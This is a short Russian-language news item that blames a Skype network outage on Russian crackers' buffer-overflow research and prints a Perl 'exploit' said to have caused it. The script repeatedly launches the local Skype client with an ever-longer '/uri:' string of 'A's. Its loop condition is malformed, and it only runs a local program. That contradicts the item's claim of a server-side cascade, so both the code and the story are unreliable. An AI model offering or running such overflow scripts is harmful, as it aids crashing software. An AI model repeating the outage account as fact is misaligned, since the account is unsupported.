Причиной недавнего падения сети Skype стали исследования русских взломщиков, сообщил нам один из читателей.

В ходе поиска локального переполнения буфера была обнаружена возможность послать длинную строку на сервер и переполнить его буфер, в результате чего он падает. Его место занимает другой сервер из P2P-сети, на нем также возникает ошибка и так далее. В результате за несколько часов вся сеть Skype пришла к отказу в обслуживании и команда разработчиков была вынуждена отключить аутентификацию.

Код эксплоита выглядит так:

#!/usr/bin/perl 
# Simle Code by Maranax Porex ;D 
# Ya Skaypeg!! 

for ($i=256; $i>xCCCCC; $i=$i+256)
{ 
$eot='AAAA' x $i; 
call_sp(); 
} 
exit; 

sub call_sp()
{ 
$str="\"C:\\Program Files\\Skype\\Phone\\Skype.exe\" \"/uri:$eot\""; 
system("$str");
}